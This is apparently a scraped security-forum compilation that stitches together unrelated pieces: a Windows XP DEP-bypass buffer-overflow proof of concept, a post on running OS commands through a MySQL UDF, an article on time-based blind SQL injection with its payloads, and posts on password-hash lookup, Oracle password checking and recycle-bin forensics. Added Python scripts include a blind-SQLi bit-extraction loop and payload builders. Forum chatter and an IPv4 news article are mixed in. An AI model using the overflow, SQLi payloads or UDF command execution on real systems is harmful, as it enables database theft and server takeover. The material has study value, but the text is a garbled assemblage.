* SetProcessDEPPolicy Function,
  http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx

Feel free to write me for comments and questions,
Bernardo Damele A. G. <bernardo.damele@gmail.com>
*/

#include <windows.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() and memcpy() */

void useSetProcessDEPPolicy()
{
    char buf[4];

    /* Overflow the string buffer and EBP register. */
    strcpy(buf, "AAAABBBB");

    /* SetProcessDEPPolicy() API has been added to Windows Vista SP1, Windows XP
       SP3 and Windows Server 2008 and can be abused by an attacker while
       exploiting a buffer overflow vulnerability to disable hardware-enforced
       DEP (NX/XD bit) for the running process.
       Overwrite EIP with the address of SetProcessDepPolicy() API, which is
       0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
       December 9, 2009.
       NOTE: You might need to adapt it depending on your system patch level. */
    memcpy(buf+8, "\xa4\x22\x86\x7c", 4);

    /* Return address of SetProcessDepPolicy(). Use an address of a JMP ESP
       instruction in kernel32.dll to jump to our shellcode on the top of the
       stack.
       NOTE: You might need to adapt it depending on your system patch level. */
    memcpy(buf+12, "\x13\x44\x87\x7c", 4);

    /* Argument for SetProcessDepPolicy(). 0x00000000 turns off DEP for this
       process. */
    memcpy(buf+16, "\x00\x00\x00\x00", 4);

    /* The shellcode to be executed after DEP has been disabled. For instance,
       a breakpoint (INT 3 instruction) to call the debug exception handler
       which will pause the process. */
    memcpy(buf+20, "\xcc", 1);
}

int main()
{
    useSetProcessDEPPolicy();
    return 0;
}
```

This source code can also be found here.

Posted 9th December 2009 by Bernardo Damele

Source: Bernardo Damele A. G.: DEP bypass with SetProcessDEPPolicy()
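The post notes that /NXCOMPAT is what opts a binary into DEP, and that the PoC was linked with it. Whether a given executable actually carries that opt-in is recorded in the DllCharacteristics field of its PE optional header, which is where an auditor checks it. Added as an example, not code from the post, here is a small parser for that field (bit 0x0100 for NX_COMPAT, 0x0040 for DYNAMIC_BASE) run over constructed header fixtures; the header layout and bit values are the documented PE format, while the fixture builder and function names are my own.

```python
import struct

IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # set by the /NXCOMPAT link flag
DLLCHARACTERISTICS_OFFSET = 70   # same offset inside the optional header for PE32 and PE32+

def pe_dll_characteristics(data):
    """Return the DllCharacteristics field of a PE image given its raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                               # IMAGE_FILE_HEADER, 20 bytes
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                   # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (IMAGE_NT_OPTIONAL_HDR32_MAGIC, IMAGE_NT_OPTIONAL_HDR64_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if opt_size < DLLCHARACTERISTICS_OFFSET + 2:
        raise ValueError("optional header too short")
    return struct.unpack_from("<H", data, opt + DLLCHARACTERISTICS_OFFSET)[0]

def dep_status(data):
    """Report the two mitigation opt-ins an auditor looks for first."""
    flags = pe_dll_characteristics(data)
    return {"nx_compat": bool(flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
            "dynamic_base": bool(flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)}

def build_minimal_pe(dll_characteristics, pe32plus=False):
    """Constructed fixture: just enough DOS/COFF/optional header for the parser.
    It is not a loadable executable, only a header to parse."""
    e_lfanew = 0x40
    dos = (b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    magic = IMAGE_NT_OPTIONAL_HDR64_MAGIC if pe32plus else IMAGE_NT_OPTIONAL_HDR32_MAGIC
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, DLLCHARACTERISTICS_OFFSET, dll_characteristics)
    return dos + b"PE\x00\x00" + coff + bytes(opt)

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:                      # e.g. a compiled PoC binary
        with open(path, "rb") as f:
            print(path, dep_status(f.read()))
    print("fixture:", dep_status(build_minimal_pe(IMAGE_DLLCHARACTERISTICS_NX_COMPAT)))
```

Run on a real file the script prints the same two booleans; on an OptOut system a missing NX_COMPAT flag does not exempt a process (the post's point), but on the default OptIn configuration of the same Windows versions it is exactly the flag that decides whether DEP applies at all.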
  10. [h=1]Command execution with a MySQL UDF[/h]

Modern database management systems are powerful applications: they provide several instruments to interact with the underlying operating system. On MySQL it is possible to create a User-Defined Function to execute commands on the underlying operating system. Marco Ivaldi demonstrated that some years ago. His raptor_udf2.c works well, but it has two limitations:

  • It is not MySQL 5.0+ compliant because it does not follow the new guidelines to create a proper UDF.
  • It calls C function system() to execute the command and always returns integer 0.

These limitations make the UDF almost useless on recent MySQL server installations if the database administrator wants to get the exit status of the command as UDF output or the command standard output itself.

I recently came across an open repository of MySQL User-Defined Functions maintained by Roland Bouman and other developers. One of their codes kept my attention: lib_mysqludf_sys (version 0.0.2) which implements three different functions to interact with the underlying environment:

  • sys_exec: executes an arbitrary command, and can thus be used to launch an external application.
  • sys_get: gets the value of an environment variable.
  • sys_set: create an environment variable, or update the value of an existing environment variable.

The first function can be used to execute operating system commands and has two advantages over raptor's UDF:

  • It is MySQL 5.0+ compliant and it compiles on both Linux as a shared object and on Windows as a dynamic-link library.
  • It returns the exit status of the executed command.

However, none of these two functions return the command standard output so I took some time to patch this last source code adding a sys_eval() UDF to return the standard output of the command if it succeeds, NULL otherwise.
The patched source code can be found on sqlmap subversion repository here and a single patch file for the original lib_mysqludf_sys version 0.0.2 is available here.

Usage example:

```console
$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
$ tar xfz lib_mysqludf_sys_0.0.3.tar.gz
$ cd lib_mysqludf_sys_0.0.3
$ sudo ./install.sh
Compiling the MySQL UDF
gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so
MySQL UDF compiled successfully

Please provide your MySQL root password
Enter password:
MySQL UDF installed successfully

$ mysql -u root -p mysql
Enter password:
[...]
mysql> SELECT sys_eval('id');
+--------------------------------------------------+
| sys_eval('id')                                   |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql)  |
+--------------------------------------------------+
1 row in set (0.02 sec)

mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
| 0                                 |
+-----------------------------------+
1 row in set (0.02 sec)

mysql> exit
Bye
$ ls -l /tmp/test_mysql
-rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_mysql
```

UPDATE on January 25, 2009: Roland Bouman uploaded to the MySQL User-Defined Functions repository my patched version of lib_mysqludf_sys. He also updated its manual page. You can now get version 0.0.3 also from his repository. PacketStormSecurity.org and milw0rm.com mirrored it here and here.

Posted 16th January 2009 by Bernardo Damele

Source: Bernardo Damele A. G.: Command execution with a MySQL UDF
  11. Recycle Bin Forensics

An icon on the Windows desktop represents a directory in which deleted files are temporarily stored. This enables you to retrieve files that you may have accidentally deleted. From time to time, you'll want to purge the recycle bin to free up space on your hard disk. You can also configure Windows so that it doesn't use the recycle bin at all, but then you won't be able to retrieve accidentally deleted files.

When a file is deleted in the Microsoft Windows operating system, it doesn't delete it permanently; it is stored in the recycle bin. If a user wants to restore the deleted file from the recycle bin, it can be done. If the user holds the shift key at the time of deleting a file, then the file will be deleted permanently without being stored in the recycle bin. In this case, the file is moved to a hidden, system folder where it is renamed and stored until further instructions are given as to what is to happen to the file.

From the forensic point of view, the recycle bin is a gold mine for gathering evidence, clues, etc. By analyzing the recycle bin, we can recover useful data. To understand how the information files are structured and how the naming convention works, there must first be an understanding of how the recycle bin works. When a user "deletes" a file in Windows, the file itself is not actually deleted. The file at this point is copied into the recycle bin's system folder, where it is held until the user gives further instructions on what to do with the file. This location varies, depending on the version of Windows the user is running. The table below shows locations from both past versions of Windows as well as Windows Vista.

Here we will see how to analyze the INFO2 file for the Windows XP operating system. First check out the Recycler folder on the C drive. The Recycler folder is a hidden directory, so we have to make some changes in the folder options to view that directory.
Open "Folder Options", then select "Show hidden files and folders" under the "Hidden files and folders" section and uncheck "Hide protected operating system files". Once the changes have been made, browse the C drive and you can see the Recycler folder. Inside the Recycler folder there will be another folder with a name like "S-1-5-21-1078081533-1957994488-1343024091-1003". One such folder is created for every user who has deleted something, named after that user's SID. In our case there is only one user on this system, which is why there is only one. Now navigate to this directory via the command prompt and type dir /a to view all files and folders. In the figure below we can see there is an INFO2 file. Extract that file to a different location. We cannot open that file with normal tools, so we will use a tool called Rifiuti. Rifiuti, the Italian word for "trash", is a recycle bin forensic analysis tool developed to examine the contents of the INFO2 file. Next put the INFO2 file inside the Rifiuti folder and run rifiuti.exe via the command prompt; run with no arguments it prints its usage. Now type:

    rifiuti.exe INFO2 > result.txt

After running the command, the program creates a result.txt file in the rifiuti folder. Open result.txt and we can clearly see the details of every file: the time the file was deleted, the drive it was deleted from, the drive number and the file size. Two points matter for the examiner: the original path in each record is what identifies the file, because the copy in the Recycler folder has been renamed to D<drive letter><index>.<extension> (for example Dc3.txt); and when a file is restored from the bin Windows does not remove its record but only zeroes the first byte of the ASCII path, so the Unicode copy of the path in the same record can still reveal what was restored.

References:
McAfee free tools: downloads/free-tools/rifiuti.aspx
What is INFO2 File Hidden in Recycled or Recycler Folder? (Raymond.CC)

By Rohit Shaw | February 12th, 2014
Source: Recycle Bin Forensics - InfoSec Institute
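As an added example (not part of the original article and not Rifiuti's own code), the following Python script parses a Windows XP INFO2 file the way Rifiuti does, using the record layout from the published forensic documentation of the format: a 20-byte header followed by fixed 800-byte records holding the ASCII path, record index, drive number, FILETIME deletion time, file size and Unicode path. The INFO2 image it parses is constructed inline so it runs offline; the paths, times and sizes in it are invented sample data, and the "first byte zeroed on restore" handling is the edge case described above.

```python
import struct
from datetime import datetime, timedelta, timezone

# Layout of INFO2 on Windows 2000/XP/2003 as described in published forensic
# documentation of the format (assumed here, not taken from the article):
# 20-byte header (version, two unknown dwords, record size, total size),
# then fixed 800-byte records.
HEADER_LEN = 20
XP_RECORD_LEN = 800
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_info2(data):
    """Return one dict per record of an INFO2 file image, like Rifiuti's listing."""
    version, _unk1, _unk2, record_len, _total = struct.unpack_from("<IIIII", data, 0)
    if record_len != XP_RECORD_LEN:
        raise ValueError(f"unsupported INFO2 record size {record_len} (version {version})")
    records = []
    offset = HEADER_LEN
    while offset + record_len <= len(data):
        rec = data[offset:offset + record_len]
        ascii_raw = rec[:260]                       # original path, NUL padded
        index, drive, ft, size = struct.unpack_from("<IIQI", rec, 260)
        unicode_path = rec[280:800].decode("utf-16-le", "replace").split("\x00", 1)[0]
        # Restoring a file from the bin does not remove its record; Windows only
        # zeroes the first byte of the ASCII path. The Unicode copy is untouched,
        # so the original name of a restored file can still be recovered.
        active = ascii_raw[0] != 0
        drive_letter = chr(ord("A") + drive)
        filename = unicode_path.rsplit("\\", 1)[-1]
        ext = "." + filename.rsplit(".", 1)[1] if "." in filename else ""
        records.append({
            "index": index,
            "drive": drive_letter,
            "path": unicode_path,
            "ascii_path": ascii_raw.split(b"\x00", 1)[0].decode("cp1252", "replace"),
            "deleted_at": filetime_to_datetime(ft),
            "size": size,
            "active": active,
            # name of the file as it sits on disk inside the Recycler\<SID> folder
            "recycled_name": f"D{drive_letter.lower()}{index}{ext}",
        })
        offset += record_len
    return records


def build_record(index, drive, path, deleted_at, size, active=True):
    """Assemble one 800-byte record (used only to construct the sample image)."""
    ascii_part = path.encode("cp1252")[:259].ljust(260, b"\x00")
    if not active:
        ascii_part = b"\x00" + ascii_part[1:]
    meta = struct.pack("<IIQI", index, drive, datetime_to_filetime(deleted_at), size)
    unicode_part = path.encode("utf-16-le")[:518].ljust(520, b"\x00")
    return ascii_part + meta + unicode_part


# Constructed sample: two deletions from drive C (drive number 2), the second
# record already restored by the user. Paths, times and sizes are invented.
SAMPLE_INFO2 = (
    struct.pack("<IIIII", 5, 0, 0, XP_RECORD_LEN, 0)
    + build_record(3, 2, r"C:\Documents and Settings\user\My Documents\plan.docx",
                   datetime(2009, 1, 16, 23, 18, 0, tzinfo=timezone.utc), 24576)
    + build_record(4, 2, r"C:\Documents and Settings\user\Desktop\notes.txt",
                   datetime(2009, 1, 17, 8, 5, 30, tzinfo=timezone.utc), 4096, active=False)
)

if __name__ == "__main__":
    for r in parse_info2(SAMPLE_INFO2):
        flag = "" if r["active"] else " (restored)"
        print(f"{r['deleted_at']:%Y-%m-%d %H:%M:%S}  {r['drive']}:  {r['size']:>8}  "
              f"{r['recycled_name']:<10} {r['path']}{flag}")
```

Point parse_info2 at the bytes of a real INFO2 file (opened in binary mode) to get the same listing Rifiuti produces; records whose "active" flag is False are the ones Rifiuti would otherwise show with an empty ASCII name.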
12. [h=1]Free Password Hash Cracker[/h]

[h=2]How CrackStation Works[/h]

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password and the correct password for that hash. The hash values are indexed so that the database can be searched quickly for a given hash. If the hash is present in the database, the password can be recovered in a fraction of a second. This only works for "unsalted" hashes: with a random per-user salt, the whole table would have to be recomputed for every salt value, so properly salted hashes are not affected. For information on password hashing systems that are not vulnerable to pre-computed lookup tables, see our hashing security page.

CrackStation's lookup tables were created by extracting every word from the Wikipedia databases and adding every password list we could find. We also applied intelligent word mangling (brute-force hybrid) to our wordlists to make them much more effective. For MD5 and SHA1 hashes we have a 190 GB, 15-billion-entry lookup table, and for other hashes we have a 19 GB, 1.5-billion-entry lookup table. You can download CrackStation's dictionaries here, and the lookup table implementation (PHP and C) is available here.

https://crackstation.net/
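To show in working code what a lookup table of this kind is and why salting defeats it, here is an added Python example; it is not CrackStation's implementation, and the wordlist and mangling rules are small constructed stand-ins for the Wikipedia-plus-leaks corpus and the hybrid rules the page mentions. The lookup is a dict keyed by hex digest rather than an indexed on-disk table, which is the same idea at toy scale.

```python
import hashlib

# Constructed wordlist standing in for the Wikipedia + leaked-list corpus.
WORDLIST = ["password", "letmein", "wikipedia", "dragon", "sunshine"]


def mangle(word):
    """Cheap hybrid rules: case variants, a leet substitution, appended digits,
    years and '!'. Real rule sets are far larger; the shape is the same."""
    seen = set()
    candidates = [word, word.capitalize(), word.upper(),
                  word.translate(str.maketrans("aeios", "43105"))]
    for base in list(candidates):
        candidates.extend(f"{base}{n}" for n in range(10))
        candidates.extend(f"{base}{year}" for year in range(2000, 2015))
        candidates.append(f"{base}!")
    for cand in candidates:
        if cand not in seen:
            seen.add(cand)
            yield cand


def digest(algo, text):
    return hashlib.new(algo, text.encode()).hexdigest()


def build_table(words, algos=("md5", "sha1")):
    """hex digest -> plaintext. Building it is the expensive, one-off part;
    every later lookup is a single indexed read."""
    table = {}
    for word in words:
        for cand in mangle(word):
            for algo in algos:
                table[digest(algo, cand)] = cand
    return table


TABLE = build_table(WORDLIST)


def lookup(table, hexhash):
    """Recover the plaintext for an unsalted MD5/SHA1 digest, or None."""
    return table.get(hexhash.strip().lower())


def salted_sha1(password, salt):
    """A per-user random salt: the digest no longer matches any table entry
    unless the attacker rebuilds the whole table for that one salt."""
    return digest("sha1", salt + password)


if __name__ == "__main__":
    print(len(TABLE), "entries")
    for h in ("5f4dcc3b5aa765d61d8327deb882cf99", digest("sha1", "Dragon2012"),
              salted_sha1("password", "x7Qe")):
        print(h, "->", lookup(TABLE, h))
```

The last lookup in the demo comes back as None even though the underlying password is the first word in the list: that is the whole argument for salting, and adding a deliberately slow hash (bcrypt, scrypt, PBKDF2) on top makes the per-salt rebuild impractical as well.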
13. Time-Based Blind SQL Injection with Heavy Queries

Published: September 12, 2007
By Chema Alonso, Microsoft Security MVP

Introduction

This article describes how attackers take advantage of SQL injection vulnerabilities by using time-based blind SQL injection with heavy queries. Our goal is to highlight the need for establishing secure development best practices for web applications instead of relying only on the security provided by perimeter defenses. This article shows exploit examples for the Microsoft SQL Server and Microsoft Access database engines, but the technique is applicable to any other database product on the market.

Time-Based Blind SQL Injection

The first references to "blind attacks" can be found in Chris Anley's June 2002 paper "(More) Advanced SQL Injection" [1], in which he calls attention to the possibility of creating such attacks, in this specific case time-based ones, one of the less common kinds. Chris gives some examples of blind SQL injection techniques:

    if (ascii(substring(@s, @byte, 1)) & ( power(2, @BIT))) > 0 waitfor delay '0:0:5'

"...it is possible to determine whether a given bit in a string is '1' or '0'. That is, the above query will pause for five seconds if bit '@BIT' of byte '@byte' in string '@s' is '1'. For example, the following query:

    declare @s varchar(8000)
    select @s = db_name()
    if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'

will pause for five seconds if the first bit of the first byte of the name of the current database is 1."

As these examples show, the information is extracted from the database through a vulnerable parameter: the injected code delays the response when the injected condition is true, and the attacker reads the answer from the response time. After this first reference, blind SQL injection techniques continued to be studied, but most of them relied on error messages produced by the attacked system rather than on delays, because provoking an error message is simpler, faster and more widely applicable than delaying the database.
One year later, in September 2003, Ofer Maor and Amichai Shulman published the paper "Blindfolded SQL Injection" [2]. There they analyze different ways to identify a parameter vulnerable to SQL injection even when the information processed and returned by the system is not visible. At the 2004 Black Hat conference, Cameron Hotchkies presented his paper "Blind SQL Injection Automation Techniques" [3]. He proposed alternative methods to automate the exploitation of a parameter vulnerable to blind SQL injection using different custom tools, and suggested three approaches to the automation: (1) searching for keywords in positive and negative results; (2) using MD5 signatures to discriminate positive from negative results; (3) using a textual difference engine. He also introduced SQueal, an automatic tool to extract information through blind SQL injection, which later evolved into another tool called Absinthe [4]. In September 2005, David Litchfield published the article "Data Mining with SQL Injection and Inference" [5], where he discussed time-based inference techniques and proposed other ways to obtain time delays using calls to stored procedures, such as xp_cmdshell on MS SQL Server to run a ping:

    xp_cmdshell 'ping -n 10 127.0.0.1'   -> application paused for about 10 seconds

Time-based techniques can be extended to any action performed by a stored procedure that is able to generate a time delay or any other measurable side effect. In December 2006, Ronald van den Heetkamp published the "SQL Injection Cheat Sheet" [6], including blind SQL injection tricks for MySQL with some examples based on the BENCHMARK function, which can generate time delays.
For instance:

    SELECT BENCHMARK(10000000,ENCODE('abc','123'));   [around 5 sec]
    SELECT BENCHMARK(1000000,MD5(CHAR(116)))          [around 7 sec]

Example:

    SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

The delay produced by a given iteration count depends on the server's hardware and load, so it has to be calibrated against each target before the timing can be trusted as a signal. A recent exploit [7], published in June 2007 at http://www.milw0rm.com (a web site dedicated to exploits and security), shows how this technique could be used to attack a game server called Solar Empire:

    $sql="F***You'),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw, ".$j.", 1)) =".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";

As the study of time-based blind SQL injection techniques moves forward, new tools have been created, such as SQL Ninja [8], which uses the WAITFOR method for Microsoft SQL Server engines, or SQL PowerInjector [9], which implements the WAITFOR method for Microsoft SQL Server, BENCHMARK functions for MySQL, and an extension of the WAITFOR method for Oracle using calls to DBMS_LOCK procedures.

Full article: Time-Based Blind SQL Injection with Heavy Queries
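To make the inference loop concrete, here is an added Python example (not code from the article or from any of the tools it names) that builds Chris Anley's bit-probe payload for SQL Server and drives it against a simulated target. The target is a stand-in object that returns the response time a real request would take instead of sleeping, so the extraction runs instantly; the secret values, the 5-second delay, the single-quoted string context the payload breaks out of and the decision threshold are all assumptions. It also includes a heavy-query variant of the probe, as a payload builder only, for engines without a sleep primitive; whether the engine evaluates the cheap condition first, which that trick depends on, must be verified per target.

```python
import re

DELAY = 5  # seconds WAITFOR DELAY pauses for (assumed; the article uses '0:0:5')


def bit_probe(column_expr, byte_index, bit, delay=DELAY):
    """MS SQL Server payload that pauses `delay` seconds iff bit `bit` of byte
    `byte_index` of `column_expr` is 1. Assumes injection into a quoted string."""
    return (f"'; IF (ASCII(SUBSTRING(({column_expr}), {byte_index}, 1)) & POWER(2, {bit})) > 0 "
            f"WAITFOR DELAY '0:0:{delay}' --")


def heavy_query_probe(condition,
                      heavy_select="(SELECT COUNT(*) FROM sysusers AS s1, sysusers AS s2, "
                                   "sysusers AS s3, sysusers AS s4)"):
    """Illustrative variant for engines without WAITFOR: the cross join is costly,
    and if the engine evaluates `condition` first and short-circuits, a slow
    response means true. The evaluation order is engine-specific (assumption)."""
    return f"' AND {condition} AND 300 > {heavy_select} --"


_PROBE_RE = re.compile(r"SUBSTRING\(\((.+?)\), (\d+), 1\)\) & POWER\(2, (\d+)\)")


class SimulatedTarget:
    """Stand-in for the vulnerable application. Instead of sleeping it returns
    the response time a real request would take, so the loop runs instantly."""

    def __init__(self, secrets, base_latency=0.3, delay=DELAY):
        self.secrets = secrets            # column expression -> value the DB returns
        self.base_latency = base_latency  # constructed: normal round trip in seconds
        self.delay = delay

    def request(self, payload):
        m = _PROBE_RE.search(payload)
        if not m:
            return self.base_latency
        expr, idx, bit = m.group(1), int(m.group(2)), int(m.group(3))
        value = self.secrets.get(expr, "")
        # SUBSTRING past the end yields '' and ASCII('') is NULL, so the comparison
        # is false and the server does not pause: that is how the end is detected.
        if idx > len(value):
            return self.base_latency
        if (ord(value[idx - 1]) >> bit) & 1:
            return self.base_latency + self.delay
        return self.base_latency


def extract_string(target, column_expr, max_len=64, threshold=DELAY / 2):
    """Recover `column_expr` one bit at a time: 8 probes per byte, stop at a 0 byte.
    The threshold sits halfway between normal latency and the injected delay."""
    result = ""
    for idx in range(1, max_len + 1):
        byte = 0
        for bit in range(8):
            if target.request(bit_probe(column_expr, idx, bit)) >= threshold:
                byte |= 1 << bit
        if byte == 0:
            break
        result += chr(byte)
    return result


if __name__ == "__main__":
    # Constructed secrets standing in for what the database would answer.
    target = SimulatedTarget({"db_name()": "master", "user_name()": "dbo"})
    print(bit_probe("db_name()", 1, 0))
    print(heavy_query_probe("ASCII(SUBSTRING(db_name(), 1, 1)) > 100"))
    print("db_name()  =", extract_string(target, "db_name()"))
    print("user_name()=", extract_string(target, "user_name()"))
```

Against a real target the request method is an HTTP call timed with a monotonic clock, and the threshold has to be set from a few baseline measurements first, because network jitter on a 5-second delay is what turns bits into errors; a binary search over ASCII ranges instead of 8 fixed probes per byte is the usual next optimisation.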
14. Oracle Password Checker (Cracker) Checkpwd 1.23 (free)

Checkpwd 1.23 is one of the fastest (see Benchmark) dictionary-based password checkers for Oracle databases. It is a useful tool for DBAs to identify Oracle accounts with weak or default passwords. Version 1.23 also comes in a variant which only reports that a password is weak but does not display the password itself. Checkpwd reads the password hashes from the view dba_users and compares them with the hashes calculated from a dictionary file. (On Oracle 11g and later the hashes are no longer exposed in dba_users and have to be read from sys.user$.) Details about Oracle (database) passwords are available here: Fact Sheet about Oracle database passwords.

Downloads

    Checkpwd 1.23 (for Windows) + default passwords + libraries + wordlist with 1.5 million words + Oracle Instant Client 10.2 (35 MB, MD5SUM: d41737cca1b07d66bd134c53989fa1b5 *oracle_checkpwd_big.zip)
    Checkpwd 1.23 (for Windows) + default passwords + libraries (1.5 MB, MD5SUM: 17a00e28b9ff0e6bed45554b43f62b06 *oracle_checkpwd.zip)
    Checkpwd 1.23 - passwords not displayed - (for Windows) + default passwords + libraries (1.5 MB, MD5SUM: 6638b0c82dea7685b6e045c9f7136168 *oracle_checkpwd_nopw.zip)
    Checkpwd 1.23 (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: aa05f5e7c8a20ec1094e68143085c3a7 *oracle_checkpwd_linux.tar.gz)
    Checkpwd 1.23 - passwords not displayed - (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: b0f356a27f6089275637555fbe70445d *oracle_checkpwd_nopw_linux.tar.gz)
    Checkpwd 1.23 (for Mac OS X (PPC)) + default passwords + wordlist with 1.5 million words + Instant Client 10.1 (48 MB, MD5SUM: fe4608bf25915585adea5bf668ec6569 *oracle_checkpwd_mac_big.tar.gz)
    Checkpwd 1.23 (for Mac OS X (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: 53bfaf05ba7375a576a55d30f4a44319 *oracle_checkpwd_mac.tar.gz)
    Checkpwd 1.23 - passwords not displayed - (for Mac OS X (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: dc4a3c623224055de5a8bac0f076f7a6 *oracle_checkpwd_nopw_mac.tar.gz)
    Checkpwd 1.23 (for Mac OS X (Intel)) + default passwords + wordlist with 1.5 million words + Instant Client 10.1 (37 MB, MD5SUM: be18c958cf1a7af27c7825c9c78c3fa6 *oracle_checkpwd_mac_intel_big.zip)
    Checkpwd 1.23 (for Mac OS X (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: f7d82902baea9df804e55b757c452aa3 *oracle_checkpwd_mac_intel.zip)
    Checkpwd 1.23 - passwords not displayed - (for Mac OS X (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: edac226122e78c7690bef1b0e4780959 *oracle_checkpwd_nopw_mac_intel.zip)

Source: Oracle Password Cracker (Checker)
15. [h=1]Offensive Computer Security Spring 2014[/h]

[h=1]Spring 2014 Lectures & Videos[/h]

This page contains all the lecture slides and YouTube videos for the Spring 2014 semester of this course.

[h=1]Course Lecture Videos / Slides / Reading:[/h]

Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on YouTube are lower quality than the ones available for direct download (see above). On the left you can find a navigation sidebar which will help you find the lectures relevant to each meta-topic.

The rest here: Offensive Computer Security Home Page (CIS 4930 / CIS 5930) Spring 2014
16. And on Linux, what can we view it with?
17. Solution: a custom DNS client in the browser.
18. And how will TheTime get a notification if only a link is put in place of the name?
19. I understand your general idea, but I want it in more detail. Let's take it like this: I try to create a topic. I want it to be called "Ajutor WiFi". I start typing "Ajuto.." and then what should happen, should the titles of the topics containing "Ajuto" appear? After I write it out in full, "Ajutor WiFi", should the topics with that name appear, exactly that name?
20. And how exactly should the search be done? A simple search, and if a topic with exactly the same name exists, give him a link to it? He should still be able to post a topic with that name though; we can't require a topic's name to be a "primary key".
21. The Google Web Search API has been officially deprecated as of November 1, 2010. Therefore, we encourage you to move to Custom Search, which provides an alternative solution. Anyway, it can't be done like that. If x posts "Programul smecher", y posts "Programul smecher v5" and z posts "Programul smecher v6", what do you do? It would take artificial intelligence for it to work properly. You end up not being allowed to post with the title "Ajutor", and many others.
22. Google will probably block us and ask for a CAPTCHA. Besides, there can be an awful lot of false positives. The idea is ok, but a good version is hard to implement.
23. If that plugin is functional, it will be "implemented". But I guarantee you I'm not going to sit down and write code for something like that. I'll have a look tomorrow.
  24. Whatever happened to the IPv4 address crisis? By Lee Schlesinger, Network World February 17, 2014 06:30 AM ET Network World - In February 2011, the global Internet Assigned Numbers Authority (IANA) allocated the last blocks of IPv4 address space to the five regional Internet registries. At the time, experts warned that within months all available IPv4 addresses in the world would be distributed to ISPs. Soon after that, unless everyone upgraded to IPv6, the world would be facing a crisis that would hamper Internet connectivity for everyone. That crisis would be exacerbated by the skyrocketing demand for IP addresses due to a variety of factors: the Internet of Things (refrigerators needing their own IP address); wearables (watches and glasses demanding connectivity); BYOD (the explosion of mobile devices allowed to connect to the corporate network); and the increase in smartphone use in developing countries. So, here we are three years later and the American Registry for Internet Numbers (ARIN) is still doling out IPv4 addresses in the United States and Canada. Whatever happened to the IPv4 address crisis? The day of reckoning still looms – it’s just been pushed out as the major Internet players have developed ingenious ways to stretch those available numbers. But these conservation efforts can only work for so long. ARIN currently has “approximately 24 million IPv4 addresses in the available pool for the region,” according to President and CEO John Curran. They’re available to ISPs large and small, but Curran predicts they will all likely be handed out by “sometime in 2014.” Even then, addresses will still be available to be assigned to the operators' clients for a while longer. And not all operators are likely to experience shortages at the same time. "It's more of a problem for networks that are growing. For networks that are stable, they can reuse addresses" as some customers drop their service and new ones sign up. 
Phil Roberts, technology program manager for the Internet Society, adds, "There's some anticipation in using addresses. Network operators get a block and parcel them out – you don't get them right when you need them." How did we get here? The problem took no one by surprise. The Internet Engineering Task Force (IETF) foresaw the global growth of network-connected devices 20 years ago, and in response drafted a new version of the Internet Protocol to address the looming shortage. IPv6 uses a 128-bit address space – that is, 2^128 addresses – yielding far more potential addresses than IPv4's 32-bit scheme, and in fact more addresses than there are grains of sand in the Earth's crust. So, why hasn't everyone just switched over to IPv6? Well, IPv6 is not backward compatible with IPv4, meaning network operators need to run a dual-stack IPv4/IPv6 network for years to come. And for IPv6 to work, it needs to be implemented end to end, meaning IPv6 has to be enabled by network hardware vendors, transit providers, access providers, content providers, and endpoint hardware makers. Since there's no economic incentive to being the first to invest in revamping your protocol support, many hardware and service providers stood on the sidelines and waited for momentum to build.

Full article: https://www.networkworld.com/news/2014/021714-ipv4-278692.html